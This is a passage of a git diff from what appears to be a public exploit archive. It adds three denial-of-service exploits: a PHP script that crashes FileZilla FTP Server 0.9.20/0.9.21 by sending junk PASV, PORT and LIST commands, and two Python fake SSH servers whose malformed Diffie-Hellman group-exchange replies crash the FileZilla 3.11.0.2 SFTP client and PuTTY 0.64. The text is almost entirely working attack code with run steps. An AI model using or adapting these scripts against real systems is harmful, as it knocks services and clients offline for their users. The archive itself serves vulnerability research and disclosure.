-socket_write($socket, $in, strlen ($in));
-
-$out=socket_read($socket, 80);
-echo $out;
-
-$in = "PASV ".$junk."\r\n";
-socket_write($socket, $in, strlen ($in));
-
-$in = "PORT ".$junk."\r\n";
-socket_write($socket, $in, strlen ($in));
-
-$in = "LIST ".$junk."\r\n";
-socket_write($socket, $in, strlen ($in));
-
-socket_close($socket);
-
-?>
-
-# milw0rm.com [2006-12-11]
+<?php
+
+# Filezilla FTP Server 0.9.20 beta / 0.9.21 "LIST", "NLST" and "NLST -al" Denial Of Service
+# by shinnai
+# mail: shinnai[at]autistici[dot[org]
+# site: http://shinnai.altervista.org
+#
+# special thanks to rgod for his first advisory about "STOR" Denial of service, see: http://retrogod.altervista.org/filezilla_0921_dos.html
+# and for code in php I never could write alone ;)
+# This one works fine also with an user with only read and list permissions enabled
+# you can change the LIST command also with NLST or NLST -al comamnds
+
+# tested on Windows XP Professional SP2 all patched
+
+error_reporting(E_ALL);
+
+$service_port = getservbyname('ftp', 'tcp');
+$address = gethostbyname('127.0.0.1');
+
+$user="test";
+$pass="test";
+
+$junk.="A*";
+
+$socket = socket_create(AF_INET, SOCK_STREAM, SOL_TCP);
+if ($socket < 0) {
+  echo "socket_create() failed:\n reason: " . socket_strerror($socket) . "\n";
+} else {
+  echo "OK.\n";
+}
+
+$result = socket_connect($socket, $address, $service_port);
+if ($result < 0) {
+  echo "socket_connect() failed:\n reason: ($result) " . socket_strerror($result) . "\n";
+} else {
+  echo "OK.\n";
+}
+
+$out=socket_read($socket, 240);
+echo $out;
+
+$in = "USER ".$user."\r\n";
+socket_write($socket, $in, strlen ($in));
+
+$out=socket_read($socket, 80);
+echo $out;
+
+$in = "PASS ".$pass."\r\n";
+socket_write($socket, $in, strlen ($in));
+
+$out=socket_read($socket, 80);
+echo $out;
+
+$in = "PASV ".$junk."\r\n";
+socket_write($socket, $in, strlen ($in));
+
+$in = "PORT ".$junk."\r\n";
+socket_write($socket, $in, strlen ($in));
+
+$in = "LIST ".$junk."\r\n";
+socket_write($socket, $in, strlen ($in));
+
+socket_close($socket);
+
+?>
+
+# milw0rm.com [2006-12-11]
diff --git a/platforms/windows/dos/37286.py b/platforms/windows/dos/37286.py
new file mode 100755
index 000000000..25c23cee3
--- /dev/null
+++ b/platforms/windows/dos/37286.py
@@ -0,0 +1,71 @@
+'''
+# Exploit title: filezilla 3.11.0.2 sftp module denial of service vulnerability
+# Date: 5-6-2015
+# Vendor homepage: http://www.chiark.greenend.org.uk
+# Software Link: http://dl.filehorse.com/win/file-transfer-and-networking/filezilla/FileZilla-3.11.0.2.exe?st=6b87ZegIN1LDhSGAw5M4wg&e=1434351489&fn=FileZilla_3.11.0.2_win32-setup.exe
+# Version: 3.11.0.2
+# Author: 3unnym00n
+
+# Details:
+# --------
+# sftp module for filezilla based on putty's psftp component.
+# when doing the ssh dh group exchange old style, if the server send a malformed dh group exchange reply, can lead the filezilla component crash
+
+# Tested On: win7, xp
+# operating steps: run the py, then execute : "D:\programfile\FileZilla FTP Client\filezilla.exe" sftp://root@127.0.0.1
+
+'''
+
+
+import socket
+import struct
+
+soc = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+soc.bind(('127.0.0.1', 22))
+soc.listen(1)
+client, addr = soc.accept()
+
+## do banner exchange
+## send server banner
+client.send('SSH-2.0-SUCK\r\n')
+## recv client banner
+client_banner = ''
+while True:
+    data = client.recv(1)
+    if data == '\x0a':
+        break
+    client_banner += data
+
+print 'the client banner is: %s'%client_banner.__repr__()
+
+## do key exchange
+## recv client algorithms
+str_pl = client.recv(4)
+pl = struct.unpack('>I', str_pl)[0]
+client.recv(pl)
+## send server algorithms
+client.send('000001b4091464f9a91726b1efcfa98bed8e93bbd93d000000596469666669652d68656c6c6d616e2d67726f75702d65786368616e67652d736861312c6469666669652d68656c6c6d616e2d67726f757031342d736861312c6469666669652d68656c6c6d616e2d67726f7570312d73686131000000077373682d727361000000576165733132382d6374722c6165733235362d6374722c6165733132382d6362632c626c6f77666973682d6362632c6165733235362d6362632c336465732d6362632c617263666f75723132382c617263666f7572323536000000576165733132382d6374722c6165733235362d6374722c6165733132382d6362632c626c6f77666973682d6362632c6165733235362d6362632c336465732d6362632c617263666f75723132382c617263666f75723235360000002b686d61632d736861312c686d61632d6d64352c686d61632d736861312d39362c686d61632d6d64352d39360000002b686d61632d736861312c686d61632d6d64352c686d61632d736861312d39362c686d61632d6d64352d3936000000046e6f6e65000000046e6f6e6500000000000000000000000000000000000000000000'.decode('hex'))
+
+
+## do dh key exchange
+## recv dh group exchange request
+str_pl = client.recv(4)
+pl = struct.unpack('>I', str_pl)[0]
+client.recv(pl)
+## send dh group exchange group
+client.send('00000114081f0000010100c038282de061be1ad34f31325efe9b1d8520db14276ceb61fe3a2cb8d77ffe3b9a067505205bba8353847fd2ea1e2471e4294862a5d4c4f9a2b80f9da0619327cdbf2eb608b0b5549294a955972aa3512821b24782dd8ab97b53aab04b48180394abfbc4dcf9b819fc0cb5ac1275ac5f16ec378163501e4b27d49c67f660333888f1d503b96fa9c6c880543d8b5f04d70fe508ffca161798ad32015145b8e9ad43aab48ada81fd1e5a8ea7711a8ff57ec7c4c081b47fab0c2e9fa468e70dd6700f3412224890d5e99527a596ce635195f3a6d35e563bf4892df2c79c809704411018d919102d12cb112ce1e66ebf5db9f409f6c82a6a6e1e21e23532cf24a6e300000001020000000000000000'.decode('hex'))
+
+## recv dh group exchange init
+str_pl = client.recv(4)
+pl = struct.unpack('>I', str_pl)[0]
+client.recv(pl)
+
+## send dh group exchange reply
+dh_gex_reply_msg = '\x00\x00\x02\x3c' ## pl
+dh_gex_reply_msg += '\x09' ## padding len
+dh_gex_reply_msg += '\x21' ## dh gex reply
+dh_gex_reply_msg += '\x00\x00\xff\xff' ## dh host key len
+dh_gex_reply_msg += 'A'*600
+
+client.sendall(dh_gex_reply_msg)
+
diff --git a/platforms/windows/dos/37291.py b/platforms/windows/dos/37291.py
new file mode 100755
index 000000000..dd96a585d
--- /dev/null
+++ b/platforms/windows/dos/37291.py
@@ -0,0 +1,70 @@
+'''
+# Exploit title: putty v0.64 denial of service vulnerability
+# Date: 5-6-2015
+# Vendor homepage: http://www.chiark.greenend.org.uk
+# Software Link: http://the.earth.li/~sgtatham/putty/latest/x86/putty-0.64-installer.exe
+# Version: 0.64
+# Author: 3unnym00n
+
+# Details:
+# --------
+# when doing the ssh dh group exchange old style, if the server send a malformed dh group exchange reply, can lead the putty crash
+
+# Tested On: win7, xp
+# operating steps: run the py, then execute : "D:\programfile\PuTTYlatest\putty.exe" -ssh  root@127.0.0.1
+
+'''
+
+
+import socket
+import struct
+
+soc = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+soc.bind(('127.0.0.1', 22))
+soc.listen(1)
+client, addr = soc.accept()
+
+## do banner exchange
+## send server banner
+client.send('SSH-2.0-paramiko_1.16.0\r\n')
+## recv client banner
+client_banner = ''
+while True:
+    data = client.recv(1)
+    if data == '\x0a':
+        break
+    client_banner += data
+
+print 'the client banner is: %s'%client_banner.__repr__()
+
+## do key exchange
+## recv client algorithms
+str_pl = client.recv(4)
+pl = struct.unpack('>I', str_pl)[0]
+client.recv(pl)
+## send server algorithms
+client.send('000001b4091464f9a91726b1efcfa98bed8e93bbd93d000000596469666669652d68656c6c6d616e2d67726f75702d65786368616e67652d736861312c6469666669652d68656c6c6d616e2d67726f757031342d736861312c6469666669652d68656c6c6d616e2d67726f7570312d73686131000000077373682d727361000000576165733132382d6374722c6165733235362d6374722c6165733132382d6362632c626c6f77666973682d6362632c6165733235362d6362632c336465732d6362632c617263666f75723132382c617263666f7572323536000000576165733132382d6374722c6165733235362d6374722c6165733132382d6362632c626c6f77666973682d6362632c6165733235362d6362632c336465732d6362632c617263666f75723132382c617263666f75723235360000002b686d61632d736861312c686d61632d6d64352c686d61632d736861312d39362c686d61632d6d64352d39360000002b686d61632d736861312c686d61632d6d64352c686d61632d736861312d39362c686d61632d6d64352d3936000000046e6f6e65000000046e6f6e6500000000000000000000000000000000000000000000'.decode('hex'))
+
+
+## do dh key exchange
+## recv dh group exchange request
+str_pl = client.recv(4)
+pl = struct.unpack('>I', str_pl)[0]
+client.recv(pl)
+## send dh group exchange group
+client.send('00000114081f0000010100c038282de061be1ad34f31325efe9b1d8520db14276ceb61fe3a2cb8d77ffe3b9a067505205bba8353847fd2ea1e2471e4294862a5d4c4f9a2b80f9da0619327cdbf2eb608b0b5549294a955972aa3512821b24782dd8ab97b53aab04b48180394abfbc4dcf9b819fc0cb5ac1275ac5f16ec378163501e4b27d49c67f660333888f1d503b96fa9c6c880543d8b5f04d70fe508ffca161798ad32015145b8e9ad43aab48ada81fd1e5a8ea7711a8ff57ec7c4c081b47fab0c2e9fa468e70dd6700f3412224890d5e99527a596ce635195f3a6d35e563bf4892df2c79c809704411018d919102d12cb112ce1e66ebf5db9f409f6c82a6a6e1e21e23532cf24a6e300000001020000000000000000'.decode('hex'))
+
+## recv dh group exchange init
+str_pl = client.recv(4)
+pl = struct.unpack('>I', str_pl)[0]
+client.recv(pl)
+
+## send dh group exchange reply
+dh_gex_reply_msg = '\x00\x00\x02\x3c' ## pl
+dh_gex_reply_msg += '\x09' ## padding len
+dh_gex_reply_msg += '\x21' ## dh gex reply
+dh_gex_reply_msg += '\x00\x00\xff\xff' ## dh host key len
+dh_gex_reply_msg += 'A'*600
+
+client.sendall(dh_gex_reply_msg)
+